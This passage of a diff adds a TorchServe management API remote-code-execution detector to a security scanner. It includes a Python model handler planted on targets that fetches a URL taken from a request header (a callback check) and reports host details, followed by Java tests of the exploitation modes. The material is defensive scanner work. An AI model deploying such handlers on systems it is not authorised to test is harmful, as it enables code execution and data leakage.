https://github.com/google/tsunami-security-scanner-plugins/tree/master/doyensec/detectors/rce/torchserve + +The plugin attempts to clean up by removing the model post-execution, with the primary output being a log entry. +""" + +import hashlib +import urllib.request +import platform +import json + +def produce_conformant_output(string, length): + """Produce a list of length `length` with `string` as the first element.""" + return [string] + ["Ok"] * (length - 1) + +def handle(data, context): + """Handle a request to the model. Echoes the input string, unless special headers are set.""" + if (context is None) or (data is None): + return None + + headers = context.get_all_request_header(0) + if headers is None: + return data + + response = data[0] + if "tsunami-execute" in headers: + # Simulate command execution by calculating an MD5 hash of the headers value + response = hashlib.md5(headers["tsunami-execute"].encode()).hexdigest() + elif "tsunami-callback" in headers: + # Validates data exfiltration by sending a GET request to the specified URL + try: + urllib.request.urlopen(headers["tsunami-callback"]) + except: + pass + elif "tsunami-info" in headers: + # Collects basic system info to simplify vulnerability mitigation + info = { + "platform": platform.platform(), + "python": platform.python_version(), + "hostname": platform.node() + } + response = json.dumps(info) + + elif "tsunami-log" in headers: + # Logs the value of the 'tsunami-log' header to the container's standard output + print(headers["tsunami-log"]) + + return produce_conformant_output(response, len(data)) diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt b/doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt new file mode 100644 index 000000000..e69de29bb diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java new file mode 100644 index 000000000..79adb92d2 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java @@ -0,0 +1,47 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.NetworkService; +import javax.inject.Inject; +import org.checkerframework.checker.nullness.qual.Nullable; + +/** + * A mock TorchServeExploiter that allows us to set the Details object returned by the + * isServiceVulnerable method. + */ +public class MockTorchServeExploiter extends TorchServeExploiter { + @Inject + public MockTorchServeExploiter( + TorchServeManagementApiConfig config, + TorchServeManagementApiArgs args, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + TorchServeManagementAPIExploiterWebServer webServer, + TorchServeRandomUtils randomUtils) { + super(config, args, httpClient, payloadGenerator, webServer, randomUtils); + } + + public boolean returnNullDetails = false; + + // Override the method to return the mock details + @Override + public @Nullable Details isServiceVulnerable(NetworkService service) { + return returnNullDetails ? null : this.details; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java new file mode 100644 index 000000000..c2e3df78b --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java @@ -0,0 +1,52 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +public class MockTorchServeManagementApiExploiterWebServer + extends TorchServeManagementAPIExploiterWebServer { + private boolean started = false; + private boolean stopped = false; + private String startedHostname = null; + private int startedPort = -1; + + @Override + public void start(String hostname, int port) { + this.started = true; + this.startedHostname = hostname; + this.startedPort = port; + } + + @Override + public void stop() { + this.stopped = true; + } + + public boolean isStarted() { + return started; + } + + public boolean isStopped() { + return stopped; + } + + public String getStartedHostname() { + return startedHostname; + } + + public int getStartedPort() { + return startedPort; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java new file mode 100644 index 000000000..4e058b16e --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java @@ -0,0 +1,22 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +public class MockTorchServeRandomUtils extends TorchServeRandomUtils { + public boolean validateHash(String hash, String randomValue) { + return true; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java new file mode 100644 index 000000000..8214580ba --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java @@ -0,0 +1,195 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TransportProtocol; +import java.io.IOException; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import org.checkerframework.checker.nullness.qual.Nullable; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public final class TorchServeExploiterTest extends TorchServeManagementApiTestBase { + @Inject private TorchServeExploiter exploiter; + + NetworkService service; + + @Before + public void setUpNetworkService() { + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTorchServe.getHostName(), mockTorchServe.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("torchserve")) + .setServiceName("http") + .build(); + } + + private void enqueueMockTorchServeResponse(String response) { + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody(response)); + } + + private String API_DESCRIPTION_RESPONSE = + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for serving deep" + + " learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/models\": {\n" + + " \"post\": {\n" + + " \"description\": \"Register a new model in TorchServe.\",\n" + + " \"operationId\": \"registerModel\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}"; + + private String EMPTY_MODELS_RESPONSE = "{\"models\": []}"; + + private String getCustomizedMetadataResponse(@Nullable String metadata) { + return "[{ \"customizedMetadata\" : \"" + (metadata == null ? "" : metadata) + "\" }]"; + } + + @Test + public void isServiceVulnerable_ifServiceIsNotTorchServe_returnsNull() throws IOException { + // This is template of Inference API response not Management API (no POST /models) + enqueueMockTorchServeResponse( + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for serving" + + " deep learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/metrics\": {\n" + + " \"get\": {\n" + + " \"description\": \"Get TorchServe application metrics in prometheus" + + " format.\",\n" + + " \"operationId\": \"metrics\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}"); + assertThat(exploiter.isServiceVulnerable(service)).isNull(); + } + + @Test + public void isServiceVulnerable_ifServiceIsVulnerableBasic_returnsDetails() throws IOException { + enqueueMockTorchServeResponse(API_DESCRIPTION_RESPONSE); + // Generate the JSON response with the array of models: + // "models": [ + // { + // "modelName": "squeezenet1_1", + // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" + // }, + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\"models\": [\n" + + "{\n" + + " \"status\": \"SUCCESS\",\n" + + " \"modelName\": \"squeezenet1_1\",\n" + + " \"modelUrl\":" + + " \"https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar\"\n" + + "}]}")); + + TorchServeExploiter.Details details = exploiter.isServiceVulnerable(service); + + assertThat(details).isNotNull(); + assertThat(details.models).containsExactly("squeezenet1_1"); + assertThat(details.getSeverity()).isEqualTo(Severity.LOW); + assertThat(details.isVerified()).isFalse(); + assertThat(details.generateDescription()) + .isEqualTo( + "An exposed TorchServe management API was detected on the target. TorchServe is a model" + + " server for PyTorch models. The management API allows adding new models to the" + + " server which by design can be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could allow unauthorized" + + " users to run arbitrary code on the server."); + assertThat(details.generateAdditionalDetails()) + .isEqualTo( + "Callback verification is not enabled in Tsunami configuration, so the exploit could" + + " not be confirmed and only the Management API detection is reported. It is" + + " recommended to enable callback verification for more conclusive vulnerability" + + " assessment.\n" + + "Models found on the target:\n" + + " - squeezenet1_1"); + } + + @Test + public void isServiceVulnerable_successfulExploitInStaticMode() throws IOException { + // Setup the details for STATIC mode + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.STATIC; + exploiter.details.staticUrl = "http://mock-static-url.com/model.mar"; + + enqueueMockTorchServeResponse(API_DESCRIPTION_RESPONSE); + + // Mocking the response for listing models - assuming an empty list for simplicity + enqueueMockTorchServeResponse(EMPTY_MODELS_RESPONSE); + + // Mocking the response for removeModelByUrl + enqueueMockTorchServeResponse(EMPTY_MODELS_RESPONSE); + + // Mocking the response for model registration + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"status\": \"Model \\\"squeezenet1_1\\\" Version: 1.0 registered with 1" + + " initial workers\"\n" + + "}")); + + // Mocking the response for model list to confirm the model was registered + enqueueMockTorchServeResponse(""); + + // Mocking the response to hash verification request + enqueueMockTorchServeResponse(getCustomizedMetadataResponse(null)); + + // Mocking the response to adding a log file + enqueueMockTorchServeResponse(getCustomizedMetadataResponse(null)); + + // Mocking the response to system info request + enqueueMockTorchServeResponse(getCustomizedMetadataResponse("{}")); + + // Perform the exploitation test + TorchServeExploiter.Details details = exploiter.isServiceVulnerable(service); + + // Assertions + assertThat(details).isNotNull(); + assertThat(details.exploitationMode).isEqualTo(TorchServeExploiter.ExploitationMode.STATIC); + assertThat(details.exploitUrl).isEqualTo(exploiter.details.staticUrl); + assertThat(details.isVerified()).isTrue(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java new file mode 100644 index 000000000..a9d185c42 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java @@ -0,0 +1,108 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TransportProtocol; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public class TorchServeExploiterTestWithCallback + extends TorchServeManagementApiTestBaseWithCallbackServer { + @Inject private TorchServeExploiter exploiter; + NetworkService service; + + public void onTestExecution() { + setUpNetworkService(); + setUpMockServices(); + } + + private void setUpNetworkService() { + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTorchServe.getHostName(), mockTorchServe.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("torchserve")) + .setServiceName("http") + .build(); + } + + public void setUpMockServices() { + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for" + + " serving deep learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/models\": {\n" + + " \"post\": {\n" + + " \"description\": \"Register a new model in TorchServe.\",\n" + + " \"operationId\": \"registerModel\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}")); + + // Mocking the response for listing models - assuming an empty list for simplicity + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody("{\"models\": []}")); + + // Mocking the response for removeModelByUrl + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody("{\"models\": []}")); + + // Mocking the response for model registration + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"status\": \"Model \\\"squeezenet1_1\\\" Version: 1.0 registered with 1" + + " initial workers\"\n" + + "}")); + } + + @Test + public void details_isServiceVulnerableReturnsNullIfCallbackNotTriggered() throws Exception { + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + assertThat(exploiter.isServiceVulnerable(service)).isNull(); + } + + @Test + public void detect_isServiceVulnerable_returnsDetailsIfCallbackTriggered() throws Exception { + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + assertThat(exploiter.isServiceVulnerable(service)).isNotNull(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java new file mode 100644 index 000000000..6736a75f9 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java @@ -0,0 +1,416 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; + +import com.google.common.collect.ImmutableList; +import com.google.inject.AbstractModule; +import com.google.inject.Module; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.util.List; +import javax.inject.Inject; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** + * Unit tests for {@link TorchServeManagementApiDetector}. Tested in isolation from the {@link + * TorchServeExploiter}. + */ +@RunWith(JUnit4.class) +public final class TorchServeManagementApiDetectorTest extends TorchServeManagementApiTestBase { + @Inject private MockTorchServeExploiter exploiter; + + private TorchServeManagementApiDetector detector; + + @Override + protected void onTestExecution() { + detector = new TorchServeManagementApiDetector(exploiter, fakeUtcClock); + } + + @Override + protected Module getBaseModule() { + Module basemoModule = super.getBaseModule(); + Module mockTorchServeExploiterModule = + new AbstractModule() { + @Override + protected void configure() { + bind(MockTorchServeExploiter.class); + } + }; + return Modules.override(basemoModule).with(mockTorchServeExploiterModule); + } + + @Test + public void detect_whenTorchServeIsNotVulnerable_doesNotReportVulnerability() throws IOException { + exploiter.returnNullDetails = true; + assertThat(getDetectionReports()).isEmpty(); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithBasicMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.BASIC; + exploiter.details.models = ImmutableList.of(); + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.LOW) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the server.") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Callback verification is not enabled in Tsunami" + + " configuration, so the exploit could not be" + + " confirmed and only the Management API detection" + + " is reported. It is recommended to enable" + + " callback verification for more conclusive" + + " vulnerability assessment.") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithSsrfMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by receiving a callback from" + + " the target while adding a new model with the following details:" + + " - Name: test_model - URL: http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "A callback was received from the target while adding a" + + " new model, confirming the exploit. Code" + + " execution was not verified directly. For a more" + + " direct confirmation of remote code execution," + + " consider using STATIC or LOCAL modes.") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithStaticMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.STATIC; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + exploiter.details.systemInfo = "{\"os\": \"Linux\"}"; + exploiter.details.messageLogged = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: "; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by adding a new model to the" + + " target with the following details: - Name: test_model - URL:" + + " http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Code execution was verified by adding a new model to" + + " the target and performing following actions:\n" + + " - Calculating a hash of a random value and" + + " comparing it to the value returned by the" + + " target (Success)\n" + + "System info collected from the target:\n" + + "{\n" + + " \"os\": \"Linux\"\n" + + "}\n\n" + + "The following log entry was generated on the" + + " target:\n\n" + + "Tsunami TorchServe Plugin: Detected and" + + " executed. Refer to Tsunami Security Scanner" + + " repo for details. No malicious activity" + + " intended. Timestamp: ") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithLocalMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.LOCAL; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + exploiter.details.systemInfo = "{\"os\": \"Linux\"}"; + exploiter.details.messageLogged = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: "; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by adding a new model to the" + + " target with the following details: - Name: test_model - URL:" + + " http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of 